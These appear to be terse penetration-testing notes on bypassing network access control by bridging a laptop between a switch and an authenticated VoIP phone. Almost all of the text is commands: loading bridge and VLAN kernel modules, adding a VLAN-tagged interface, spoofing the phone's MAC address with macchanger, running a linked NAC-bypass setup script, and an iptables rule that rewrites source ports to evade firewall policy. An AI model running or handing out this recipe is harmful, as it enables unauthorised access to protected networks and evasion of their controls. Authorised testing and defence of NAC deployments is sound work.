NAC bypass

Network access

NAC bypass scenario with VLAN tagging on a phone

upstream = interface connected to the switch = eth0

phy = interface connected to supplicant = eth1

------------ only once
modprobe br_netfilter
modprobe 8021q
----------- activate packet tagging
ifconfig eth1 down
ifconfig br0 down
vconfig add eth0 <VLAN_number>
ip addr add <192.168.190.0/24> dev eth0.101
macchanger -m <supplicant_MAC> eth0
ifconfig eth0.101 up
route add default gw <gw_ip>
------------- cleaning
ifconfig eth0.101 down 
macchanger -p eth0
ifconfig eth1 up

https://github.com/scipag/nac_bypass - if possible hardcode the 3 parameters

./nac_bypass_setup.sh -1 eth0 -2 eth1

Modify the source port for all packet in order to evade FW policy. Take the source port used for device administration for example:

iptables -t nat -I POSTROUTING -p tcp -m tcp -j MASQUERADE --to-ports <22>